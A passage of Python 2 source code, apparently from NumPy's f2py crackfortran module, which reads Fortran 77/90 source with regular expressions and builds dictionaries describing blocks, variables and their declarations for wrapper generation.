<commentchar>f2py<line> is read as <line> Note: pythonmodule is introduced to represent Python module Usage: `postlist=crackfortran(files,funcs)` `postlist` contains declaration information read from the list of files `files`. 
`crack2fortran(postlist)` returns a fortran code to be saved to pyf-file `postlist` has the following structure: *** it is a list of dictionaries containing `blocks': B = {'block','body','vars','parent_block'[,'name','prefix','args','result', 'implicit','externals','interfaced','common','sortvars', 'commonvars','note']} B['block'] = 'interface' | 'function' | 'subroutine' | 'module' | 'program' | 'block data' | 'type' | 'pythonmodule' B['body'] --- list containing `subblocks' with the same structure as `blocks' B['parent_block'] --- dictionary of a parent block: C['body'][<index>]['parent_block'] is C B['vars'] --- dictionary of variable definitions B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first) B['name'] --- name of the block (not if B['block']=='interface') B['prefix'] --- prefix string (only if B['block']=='function') B['args'] --- list of argument names if B['block']== 'function' | 'subroutine' B['result'] --- name of the return value (only if B['block']=='function') B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None B['externals'] --- list of variables being external B['interfaced'] --- list of variables being external and defined B['common'] --- dictionary of common blocks (list of objects) B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions) B['from'] --- string showing the 'parents' of the current block B['use'] --- dictionary of modules used in current block: {<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}} B['note'] --- list of LaTeX comments on the block B['f2pyenhancements'] --- optional dictionary {'threadsafe':'','fortranname':<name>, 'callstatement':<C-expr>|<multi-line block>, 'callprotoargument':<C-expr-list>, 'usercode':<multi-line block>|<list of multi-line blocks>, 'pymethoddef:<multi-line block>' } B['entry'] --- dictionary {entryname:argslist,..} B['varnames'] --- list of variable names given in the 
order of reading the Fortran code, useful for derived types. B['saved_interface'] --- a string of scanned routine signature, defines explicit interface *** Variable definition is a dictionary D = B['vars'][<variable name>] = {'typespec'[,'attrspec','kindselector','charselector','=','typename']} D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' | 'double precision' | 'integer' | 'logical' | 'real' | 'type' D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)', 'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)', 'optional','required', etc) K = D['kindselector'] = {['*','kind']} (only if D['typespec'] = 'complex' | 'integer' | 'logical' | 'real' ) C = D['charselector'] = {['*','len','kind']} (only if D['typespec']=='character') D['='] --- initialization expression string D['typename'] --- name of the type if D['typespec']=='type' D['dimension'] --- list of dimension bounds D['intent'] --- list of intent specifications D['depend'] --- list of variable names on which current variable depends on D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised D['note'] --- list of LaTeX comments on the variable *** Meaning of kind/char selectors (few examples): D['typespec>']*K['*'] D['typespec'](kind=K['kind']) character*C['*'] character(len=C['len'],kind=C['kind']) (see also fortran type declaration statement formats below) Fortran 90 type declaration statement format (F77 is subset of F90) ==================================================================== (Main source: IBM XL Fortran 5.1 Language Reference Manual) type declaration = <typespec> [[<attrspec>]::] <entitydecl> <typespec> = byte | character[<charselector>] | complex[<kindselector>] | double complex | double precision | integer[<kindselector>] | logical[<kindselector>] | real[<kindselector>] | type(<typename>) <charselector> = * <charlen> | ([len=]<len>[,[kind=]<kind>]) | (kind=<kind>[,len=<len>]) <kindselector> = * <intlen> 
| ([kind=]<kind>) <attrspec> = comma separated list of attributes. Only the following attributes are used in building up the interface: external (parameter --- affects '=' key) optional intent Other attributes are ignored. <intentspec> = in | out | inout <arrayspec> = comma separated list of dimension bounds. <entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>] [/<init_expr>/ | =<init_expr>] [,<entitydecl>] In addition, the following attributes are used: check,depend,note TODO: * Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)' -> 'real x(2)') The above may be solved by creating appropriate preprocessor program, for example. """ # import sys import string import fileinput import re import pprint import os import copy from auxfuncs import * # Global flags: strictf77=1 # Ignore `!' comments unless line[0]=='!' sourcecodeform='fix' # 'fix','free' quiet=0 # Be verbose if 0 (Obsolete: not used any more) verbose=1 # Be quiet if 0, extra verbose if > 1. 
tabchar=4*' ' pyffilename='' f77modulename='' skipemptyends=0 # for old F77 programs without 'program' statement ignorecontains=1 dolowercase=1 debug=[] ## do_analyze = 1 ###### global variables ## use reload(crackfortran) to reset these variables groupcounter=0 grouplist={groupcounter:[]} neededmodule=-1 expectbegin=1 skipblocksuntil=-1 usermodules=[] f90modulevars={} gotnextfile=1 filepositiontext='' currentfilename='' skipfunctions=[] skipfuncs=[] onlyfuncs=[] include_paths=[] previous_context = None ###### Some helper functions def show(o,f=0):pprint.pprint(o) errmess=sys.stderr.write def outmess(line,flag=1): global filepositiontext if not verbose: return if not quiet: if flag:sys.stdout.write(filepositiontext) sys.stdout.write(line) re._MAXCACHE=50 defaultimplicitrules={} for c in "abcdefghopqrstuvwxyz$_": defaultimplicitrules[c]={'typespec':'real'} for c in "ijklmn": defaultimplicitrules[c]={'typespec':'integer'} del c badnames={} invbadnames={} for n in ['int','double','float','char','short','long','void','case','while', 'return','signed','unsigned','if','for','typedef','sizeof','union', 'struct','static','register','new','break','do','goto','switch', 'continue','else','inline','extern','delete','const','auto', 'len','rank','shape','index','slen','size','_i', 'max', 'min', 'flen','fshape', 'string','complex_double','float_double','stdin','stderr','stdout', 'type','default']: badnames[n]=n+'_bn' invbadnames[n+'_bn']=n def rmbadname1(name): if name in badnames: errmess('rmbadname1: Replacing "%s" with "%s".\n'%(name,badnames[name])) return badnames[name] return name def rmbadname(names): return map(rmbadname1,names) def undo_rmbadname1(name): if name in invbadnames: errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'\ %(name,invbadnames[name])) return invbadnames[name] return name def undo_rmbadname(names): return map(undo_rmbadname1,names) def getextension(name): i=name.rfind('.') if i==-1: return '' if '\\' in name[i:]: return '' if '/' in name[i:]: 
return '' return name[i+1:] is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z',re.I).match _has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-',re.I).search _has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-',re.I).search _has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-',re.I).search _free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]',re.I).match def is_free_format(file): """Check if file is in free format Fortran.""" # f90 allows both fixed and free format, assuming fixed unless # signs of free format are detected. result = 0 f = open(file,'r') line = f.readline() n = 15 # the number of non-comment lines to scan for hints if _has_f_header(line): n = 0 elif _has_f90_header(line): n = 0 result = 1 while n>0 and line: if line[0]!='!' and line.strip(): n -= 1 if (line[0]!='\t' and _free_f90_start(line[:5])) or line[-2:-1]=='&': result = 1 break line = f.readline() f.close() return result ####### Read fortran (77,90) code def readfortrancode(ffile,dowithline=show,istop=1): """ Read fortran codes from files and 1) Get rid of comments, line continuations, and empty lines; lower cases. 2) Call dowithline(line) on every line. 3) Recursively call itself when statement \"include '<filename>'\" is met. 
""" global gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase,include_paths if not istop: saveglobals=gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase if ffile==[]: return localdolowercase = dolowercase cont=0 finalline='' ll='' commentline=re.compile(r'(?P<line>([^"]*["][^"]*["][^"!]*|[^\']*\'[^\']*\'[^\'!]*|[^!\'"]*))!{1}(?P<rest>.*)') includeline=re.compile(r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")',re.I) cont1=re.compile(r'(?P<line>.*)&\s*\Z') cont2=re.compile(r'(\s*&|)(?P<line>.*)') mline_mark = re.compile(r".*?'''") if istop: dowithline('',-1) ll,l1='','' spacedigits=[' ']+map(str,range(10)) filepositiontext='' fin=fileinput.FileInput(ffile) while 1: l=fin.readline() if not l: break if fin.isfirstline(): filepositiontext='' currentfilename=fin.filename() gotnextfile=1 l1=l strictf77=0 sourcecodeform='fix' ext = os.path.splitext(currentfilename)[1] if is_f_file(currentfilename) and \ not (_has_f90_header(l) or _has_fix_header(l)): strictf77=1 elif is_free_format(currentfilename) and not _has_fix_header(l): sourcecodeform='free' if strictf77: beginpattern=beginpattern77 else: beginpattern=beginpattern90 outmess('\tReading file %s (format:%s%s)\n'\ %(`currentfilename`,sourcecodeform, strictf77 and ',strict' or '')) l=l.expandtabs().replace('\xa0',' ') while not l=='': # Get rid of newline characters if l[-1] not in "\n\r\f": break l=l[:-1] if not strictf77: r=commentline.match(l) if r: l=r.group('line')+' ' # Strip comments starting with `!' 
rl=r.group('rest') if rl[:4].lower()=='f2py': # f2py directive l = l + 4*' ' r=commentline.match(rl[4:]) if r: l=l+r.group('line') else: l = l + rl[4:] if l.strip()=='': # Skip empty line cont=0 continue if sourcecodeform=='fix': if l[0] in ['*','c','!','C','#']: if l[1:5].lower()=='f2py': # f2py directive l=' '+l[5:] else: # Skip comment line cont=0 continue elif strictf77: if len(l)>72: l=l[:72] if not (l[0] in spacedigits): raise Exception('readfortrancode: Found non-(space,digit) char ' 'in the first column.\n\tAre you sure that ' 'this code is in fix form?\n\tline=%s' % `l`) if (not cont or strictf77) and (len(l)>5 and not l[5]==' '): # Continuation of a previous line ll=ll+l[6:] finalline='' origfinalline='' else: if not strictf77: # F90 continuation r=cont1.match(l) if r: l=r.group('line') # Continuation follows .. if cont: ll=ll+cont2.match(l).group('line') finalline='' origfinalline='' else: l=' '+l[5:] # clean up line beginning from possible digits. if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline=ll ll=l cont=(r is not None) else: l=' '+l[5:] # clean up line beginning from possible digits. if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline =ll ll=l elif sourcecodeform=='free': if not cont and ext=='.pyf' and mline_mark.match(l): l = l + '\n' while 1: lc = fin.readline() if not lc: errmess('Unexpected end of file when reading multiline\n') break l = l + lc if mline_mark.match(lc): break l = l.rstrip() r=cont1.match(l) if r: l=r.group('line') # Continuation follows .. 
if cont: ll=ll+cont2.match(l).group('line') finalline='' origfinalline='' else: if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline =ll ll=l cont=(r is not None) else: raise ValueError("Flag sourcecodeform must be either 'fix' or 'free': %s"%`sourcecodeform`) filepositiontext='Line #%d in %s:"%s"\n\t' % (fin.filelineno()-1,currentfilename,l1) m=includeline.match(origfinalline) if m: fn=m.group('name') if os.path.isfile(fn): readfortrancode(fn,dowithline=dowithline,istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir,fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1,dowithline=dowithline,istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n'%(`fn`, os.pathsep.join(include_dirs))) else: dowithline(finalline) l1=ll if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline = ll filepositiontext='Line #%d in %s:"%s"\n\t' % (fin.filelineno()-1,currentfilename,l1) m=includeline.match(origfinalline) if m: fn=m.group('name') if os.path.isfile(fn): readfortrancode(fn,dowithline=dowithline,istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir,fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1,dowithline=dowithline,istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. 
Ignoring.\n'%(`fn`, os.pathsep.join(include_dirs))) else: dowithline(finalline) filepositiontext='' fin.close() if istop: dowithline('',1) else: gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase=saveglobals ########### Crack line beforethisafter=r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))'+ \ r'\s*(?P<this>(\b(%s)\b))'+ \ r'\s*(?P<after>%s)\s*\Z' ## fortrantypes='character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte' typespattern=re.compile(beforethisafter%('',fortrantypes,fortrantypes,'.*'),re.I),'type' typespattern4implicit=re.compile(beforethisafter%('',fortrantypes+'|static|automatic|undefined',fortrantypes+'|static|automatic|undefined','.*'),re.I) # functionpattern=re.compile(beforethisafter%('([a-z]+[\w\s(=*+-/)]*?|)','function','function','.*'),re.I),'begin' subroutinepattern=re.compile(beforethisafter%('[a-z\s]*?','subroutine','subroutine','.*'),re.I),'begin' #modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin' # groupbegins77=r'program|block\s*data' beginpattern77=re.compile(beforethisafter%('',groupbegins77,groupbegins77,'.*'),re.I),'begin' groupbegins90=groupbegins77+r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()' beginpattern90=re.compile(beforethisafter%('',groupbegins90,groupbegins90,'.*'),re.I),'begin' groupends=r'end|endprogram|endblockdata|endmodule|endpythonmodule|endinterface' endpattern=re.compile(beforethisafter%('',groupends,groupends,'[\w\s]*'),re.I),'end' #endifs='end\s*(if|do|where|select|while|forall)' endifs='(end\s*(if|do|where|select|while|forall))|(module\s*procedure)' endifpattern=re.compile(beforethisafter%('[\w]*?',endifs,endifs,'[\w\s]*'),re.I),'endif' # implicitpattern=re.compile(beforethisafter%('','implicit','implicit','.*'),re.I),'implicit' dimensionpattern=re.compile(beforethisafter%('','dimension|virtual','dimension|virtual','.*'),re.I),'dimension' 
externalpattern=re.compile(beforethisafter%('','external','external','.*'),re.I),'external' optionalpattern=re.compile(beforethisafter%('','optional','optional','.*'),re.I),'optional' requiredpattern=re.compile(beforethisafter%('','required','required','.*'),re.I),'required' publicpattern=re.compile(beforethisafter%('','public','public','.*'),re.I),'public' privatepattern=re.compile(beforethisafter%('','private','private','.*'),re.I),'private' intrisicpattern=re.compile(beforethisafter%('','intrisic','intrisic','.*'),re.I),'intrisic' intentpattern=re.compile(beforethisafter%('','intent|depend|note|check','intent|depend|note|check','\s*\(.*?\).*'),re.I),'intent' parameterpattern=re.compile(beforethisafter%('','parameter','parameter','\s*\(.*'),re.I),'parameter' datapattern=re.compile(beforethisafter%('','data','data','.*'),re.I),'data' callpattern=re.compile(beforethisafter%('','call','call','.*'),re.I),'call' entrypattern=re.compile(beforethisafter%('','entry','entry','.*'),re.I),'entry' callfunpattern=re.compile(beforethisafter%('','callfun','callfun','.*'),re.I),'callfun' commonpattern=re.compile(beforethisafter%('','common','common','.*'),re.I),'common' usepattern=re.compile(beforethisafter%('','use','use','.*'),re.I),'use' containspattern=re.compile(beforethisafter%('','contains','contains',''),re.I),'contains' formatpattern=re.compile(beforethisafter%('','format','format','.*'),re.I),'format' ## Non-fortran and f2py-specific statements f2pyenhancementspattern=re.compile(beforethisafter%('','threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef','threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef','.*'),re.I|re.S),'f2pyenhancements' multilinepattern = re.compile(r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z",re.S),'multiline' ## def _simplifyargs(argsline): a = [] for n in markoutercomma(argsline).split('@,@'): for r in '(),': n = n.replace(r,'_') a.append(n) return ','.join(a) crackline_re_1 = 
re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*',re.I) def crackline(line,reset=0): """ reset=-1 --- initialize reset=0 --- crack the line reset=1 --- final check if mismatch of blocks occured Cracked data is saved in grouplist[0]. """ global beginpattern,groupcounter,groupname,groupcache,grouplist,gotnextfile,\ filepositiontext,currentfilename,neededmodule,expectbegin,skipblocksuntil,\ skipemptyends,previous_context if ';' in line and not (f2pyenhancementspattern[0].match(line) or multilinepattern[0].match(line)): for l in line.split(';'): assert reset==0,`reset` # XXX: non-zero reset values need testing crackline(l,reset) return if reset<0: groupcounter=0 groupname={groupcounter:''} groupcache={groupcounter:{}} grouplist={groupcounter:[]} groupcache[groupcounter]['body']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['block']='' groupcache[groupcounter]['name']='' neededmodule=-1 skipblocksuntil=-1 return if reset>0: fl=0 if f77modulename and neededmodule==groupcounter: fl=2 while groupcounter>fl: outmess('crackline: groupcounter=%s groupname=%s\n'%(`groupcounter`,`groupname`)) outmess('crackline: Mismatch of blocks encountered. 
Trying to fix it by assuming "end" statement.\n') grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 if f77modulename and neededmodule==groupcounter: grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end interface grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end module neededmodule=-1 return if line=='': return flag=0 for pat in [dimensionpattern,externalpattern,intentpattern,optionalpattern, requiredpattern, parameterpattern,datapattern,publicpattern,privatepattern, intrisicpattern, endifpattern,endpattern, formatpattern, beginpattern,functionpattern,subroutinepattern, implicitpattern,typespattern,commonpattern, callpattern,usepattern,containspattern, entrypattern, f2pyenhancementspattern, multilinepattern ]: m = pat[0].match(line) if m: break flag=flag+1 if not m: re_1 = crackline_re_1 if 0<=skipblocksuntil<=groupcounter:return if 'externals' in groupcache[groupcounter]: for name in groupcache[groupcounter]['externals']: if name in invbadnames: name=invbadnames[name] if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']: continue m1=re.match(r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z'%name,markouterparen(line),re.I) if m1: m2 = re_1.match(m1.group('before')) a = _simplifyargs(m1.group('args')) if m2: line='callfun %s(%s) result (%s)'%(name,a,m2.group('result')) else: line='callfun %s(%s)'%(name,a) m = callfunpattern[0].match(line) if not m: outmess('crackline: could not resolve function call for line=%s.\n'%`line`) return analyzeline(m,'callfun',line) return if verbose>1 or (verbose==1 and 
currentfilename.lower().endswith('.pyf')): previous_context = None outmess('crackline:%d: No pattern for line\n'%(groupcounter)) return elif pat[1]=='end': if 0<=skipblocksuntil<groupcounter: groupcounter=groupcounter-1 if skipblocksuntil<=groupcounter: return if groupcounter<=0: raise Exception('crackline: groupcounter(=%s) is nonpositive. ' 'Check the blocks.' \ % (groupcounter)) m1 = beginpattern[0].match((line)) if (m1) and (not m1.group('this')==groupname[groupcounter]): raise Exception('crackline: End group %s does not match with ' 'previous Begin group %s\n\t%s' % \ (`m1.group('this')`, `groupname[groupcounter]`, filepositiontext) ) if skipblocksuntil==groupcounter: skipblocksuntil=-1 grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 if not skipemptyends: expectbegin=1 elif pat[1] == 'begin': if 0<=skipblocksuntil<=groupcounter: groupcounter=groupcounter+1 return gotnextfile=0 analyzeline(m,pat[1],line) expectbegin=0 elif pat[1]=='endif': pass elif pat[1]=='contains': if ignorecontains: return if 0<=skipblocksuntil<=groupcounter: return skipblocksuntil=groupcounter else: if 0<=skipblocksuntil<=groupcounter:return analyzeline(m,pat[1],line) def markouterparen(line): l='';f=0 for c in line: if c=='(': f=f+1 if f==1: l=l+'@(@'; continue elif c==')': f=f-1 if f==0: l=l+'@)@'; continue l=l+c return l def markoutercomma(line,comma=','): l='';f=0 cc='' for c in line: if (not cc or cc==')') and c=='(': f=f+1 cc = ')' elif not cc and c=='\'' and (not l or l[-1]!='\\'): f=f+1 cc = '\'' elif c==cc: f=f-1 if f==0: cc='' elif c==comma and f==0: l=l+'@'+comma+'@' continue l=l+c assert not f,`f,line,l,cc` return l def unmarkouterparen(line): r = line.replace('@(@','(').replace('@)@',')') return r def appenddecl(decl,decl2,force=1): if not decl: decl={} if not decl2: return decl if decl is decl2: return decl for k in decl2.keys(): if k=='typespec': 
if force or k not in decl: decl[k]=decl2[k] elif k=='attrspec': for l in decl2[k]: decl=setattrspec(decl,l,force) elif k=='kindselector': decl=setkindselector(decl,decl2[k],force) elif k=='charselector': decl=setcharselector(decl,decl2[k],force) elif k in ['=','typename']: if force or k not in decl: decl[k]=decl2[k] elif k=='note': pass elif k in ['intent','check','dimension','optional','required']: errmess('appenddecl: "%s" not implemented.\n'%k) else: raise Exception('appenddecl: Unknown variable definition key:' + \ str(k)) return decl selectpattern=re.compile(r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z',re.I) nameargspattern=re.compile(r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z',re.I) callnameargspattern=re.compile(r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z',re.I) real16pattern = re.compile(r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)') real8pattern = re.compile(r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))') _intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b',re.I) def _is_intent_callback(vdecl): for a in vdecl.get('attrspec',[]): if _intentcallbackpattern.match(a): return 1 return 0 def _resolvenameargspattern(line): line = markouterparen(line) m1=nameargspattern.match(line) if m1: return m1.group('name'),m1.group('args'),m1.group('result'), m1.group('bind') m1=callnameargspattern.match(line) if m1: return m1.group('name'),m1.group('args'),None, None return None,[],None, None def analyzeline(m,case,line): global groupcounter,groupname,groupcache,grouplist,filepositiontext,\ currentfilename,f77modulename,neededinterface,neededmodule,expectbegin,\ gotnextfile,previous_context block=m.group('this') if case != 'multiline': previous_context = None if expectbegin and case not in ['begin','call','callfun','type'] \ and not skipemptyends and groupcounter<1: 
newname=os.path.basename(currentfilename).split('.')[0] outmess('analyzeline: no group yet. Creating program group with name "%s".\n'%newname) gotnextfile=0 groupcounter=groupcounter+1 groupname[groupcounter]='program' groupcache[groupcounter]={} grouplist[groupcounter]=[] groupcache[groupcounter]['body']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['block']='program' groupcache[groupcounter]['name']=newname groupcache[groupcounter]['from']='fromsky' expectbegin=0 if case in ['begin','call','callfun']: # Crack line => block,name,args,result block = block.lower() if re.match(r'block\s*data',block,re.I): block='block data' if re.match(r'python\s*module',block,re.I): block='python module' name,args,result,bind = _resolvenameargspattern(m.group('after')) if name is None: if block=='block data': name = '_BLOCK_DATA_' else: name = '' if block not in ['interface','block data']: outmess('analyzeline: No name/args pattern found for line.\n') previous_context = (block,name,groupcounter) if args: args=rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args=[] if '' in args: while '' in args: args.remove('') outmess('analyzeline: argument list is malformed (missing argument).\n') # end of crack line => block,name,args,result needmodule=0 needinterface=0 if case in ['call','callfun']: needinterface=1 if 'args' not in groupcache[groupcounter]: return if name not in groupcache[groupcounter]['args']: return for it in grouplist[groupcounter]: if it['name']==name: return if name in groupcache[groupcounter]['interfaced']: return block={'call':'subroutine','callfun':'function'}[case] if f77modulename and neededmodule==-1 and groupcounter<=1: neededmodule=groupcounter+2 needmodule=1 if block != 'interface': needinterface=1 # Create new block(s) groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] if needmodule: if verbose>1: outmess('analyzeline: Creating module block %s\n'%`f77modulename`,0) 
groupname[groupcounter]='module' groupcache[groupcounter]['block']='python module' groupcache[groupcounter]['name']=f77modulename groupcache[groupcounter]['from']='' groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] if needinterface: if verbose>1: outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (groupcounter),0) groupname[groupcounter]='interface' groupcache[groupcounter]['block']='interface' groupcache[groupcounter]['name']='unknown_interface' groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],groupcache[groupcounter-1]['name']) groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] groupname[groupcounter]=block groupcache[groupcounter]['block']=block if not name: name='unknown_'+block groupcache[groupcounter]['prefix']=m.group('before') groupcache[groupcounter]['name']=rmbadname1(name) groupcache[groupcounter]['result']=result if groupcounter==1: groupcache[groupcounter]['from']=currentfilename else: if f77modulename and groupcounter==3: groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],currentfilename) else: groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],groupcache[groupcounter-1]['name']) for k in groupcache[groupcounter].keys(): if not groupcache[groupcounter][k]: del groupcache[groupcounter][k] groupcache[groupcounter]['args']=args groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['entry']={} # end of creation if block=='type': 
groupcache[groupcounter]['varnames'] = [] if case in ['call','callfun']: # set parents variables if name not in groupcache[groupcounter-2]['externals']: groupcache[groupcounter-2]['externals'].append(name) groupcache[groupcounter]['vars']=copy.deepcopy(groupcache[groupcounter-2]['vars']) #try: del groupcache[groupcounter]['vars'][groupcache[groupcounter-2]['name']] #except: pass try: del groupcache[groupcounter]['vars'][name][groupcache[groupcounter]['vars'][name]['attrspec'].index('external')] except: pass if block in ['function','subroutine']: # set global attributes try: groupcache[groupcounter]['vars'][name]=appenddecl(groupcache[groupcounter]['vars'][name],groupcache[groupcounter-2]['vars']['']) except: pass if case=='callfun': # return type if result and result in groupcache[groupcounter]['vars']: if not name==result: groupcache[groupcounter]['vars'][name]=appenddecl(groupcache[groupcounter]['vars'][name],groupcache[groupcounter]['vars'][result]) #if groupcounter>1: # name is interfaced try: groupcache[groupcounter-2]['interfaced'].append(name) except: pass if block=='function': t=typespattern[0].match(m.group('before')+' '+name) if t: typespec,selector,attr,edecl=cracktypespec0(t.group('this'),t.group('after')) updatevars(typespec,selector,attr,edecl) if case in ['call','callfun']: grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end routine grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end interface elif case=='entry': name,args,result,bind=_resolvenameargspattern(m.group('after')) if name is not None: if args: args=rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args=[] assert result is None,`result` groupcache[groupcounter]['entry'][name] = args previous_context = 
('entry',name,groupcounter) elif case=='type': typespec,selector,attr,edecl=cracktypespec0(block,m.group('after')) last_name = updatevars(typespec,selector,attr,edecl) if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case in ['dimension','intent','optional','required','external','public','private','intrisic']: edecl=groupcache[groupcounter]['vars'] ll=m.group('after').strip() i=ll.find('::') if i<0 and case=='intent': i=markouterparen(ll).find('@)@')-2 ll=ll[:i+1]+'::'+ll[i+1:] i=ll.find('::') if ll[i:]=='::' and 'args' in groupcache[groupcounter]: outmess('All arguments will have attribute %s%s\n'%(m.group('this'),ll[:i])) ll = ll + ','.join(groupcache[groupcounter]['args']) if i<0:i=0;pl='' else: pl=ll[:i].strip();ll=ll[i+2:] ch = markoutercomma(pl).split('@,@') if len(ch)>1: pl = ch[0] outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (','.join(ch[1:]))) last_name = None for e in [x.strip() for x in markoutercomma(ll).split('@,@')]: m1=namepattern.match(e) if not m1: if case in ['public','private']: k='' else: print m.groupdict() outmess('analyzeline: no name pattern found in %s statement for %s. 
Skipping.\n'%(case,`e`)) continue else: k=rmbadname1(m1.group('name')) if k not in edecl: edecl[k]={} if case=='dimension': ap=case+m1.group('after') if case=='intent': ap=m.group('this')+pl if _intentcallbackpattern.match(ap): if k not in groupcache[groupcounter]['args']: if groupcounter>1: if '__user__' not in groupcache[groupcounter-2]['name']: outmess('analyzeline: missing __user__ module (could be nothing)\n') if k!=groupcache[groupcounter]['name']: # fixes ticket 1693 outmess('analyzeline: appending intent(callback) %s'\ ' to %s arguments\n' % (k,groupcache[groupcounter]['name'])) groupcache[groupcounter]['args'].append(k) else: errmess('analyzeline: intent(callback) %s is ignored' % (k)) else: errmess('analyzeline: intent(callback) %s is already'\ ' in argument list' % (k)) if case in ['optional','required','public','external','private','intrisic']: ap=case if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append(ap) else: edecl[k]['attrspec']=[ap] if case=='external': if groupcache[groupcounter]['block']=='program': outmess('analyzeline: ignoring program arguments\n') continue if k not in groupcache[groupcounter]['args']: #outmess('analyzeline: ignoring external %s (not in arguments list)\n'%(`k`)) continue if 'externals' not in groupcache[groupcounter]: groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['externals'].append(k) last_name = k groupcache[groupcounter]['vars']=edecl if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='parameter': edecl=groupcache[groupcounter]['vars'] ll=m.group('after').strip()[1:-1] last_name = None for e in markoutercomma(ll).split('@,@'): try: k,initexpr=[x.strip() for x in e.split('=')] except: 